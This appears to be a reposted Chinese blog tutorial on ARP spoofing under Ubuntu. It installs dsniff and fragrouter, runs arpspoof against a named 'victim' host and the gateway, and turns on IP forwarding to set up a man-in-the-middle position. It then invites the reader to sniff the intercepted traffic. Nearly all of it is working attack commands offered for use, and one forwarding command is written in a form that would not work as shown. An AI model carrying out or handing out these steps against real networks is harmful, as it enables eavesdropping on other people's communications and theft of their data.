Ubuntu进行ARP欺骗

原文源自:https://holmesian.org/Ubuntu_arp_hacking

假设系统是ubuntu 9.10,网络情况:路由ip:172.16.86.254 我的电脑ip:172.16.86.2 受害者ip:172.16.86.3

主要用到的工具有2个,一个是Dsniff,还有一个是 fragrouter。

I. 安装Dsniff

    sudo apt-get install dsniff

II. 安装 fragrouter

在/etc/apt/sources.list 文件中添加源:

deb http://cz.archive.ubuntu.com/ubuntu hardy main universe

再执行

    sudo apt-get install fragrouter

III. ARP欺骗

欺骗172.16.86.3,告诉172.16.86.3,网关172.16.86.254的MAC地址是本机的MAC地址:

    sudo arpspoof -t 172.16.86.3 172.16.86.254 

欺骗网关,告诉网关,172.16.86.3的MAC地址是本机的MAC地址:

    sudo arpspoof -t 172.16.86.254 172.16.86.3 

ARP数据包广播之后,网关和受害机之间的数据交流就都需要经过我的机器了

设置转发,让受害机与网关的通信正常:

    $ sudo echo 1 >/proc/sys/net/ipv4/ip_forward
    $ fragrouter -B1

接下来就可以嗅探数据咯,还不会用Dsniff的TX去网上搜索一些资料看看,或者转用WireShark的GUI工具抓包……

  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值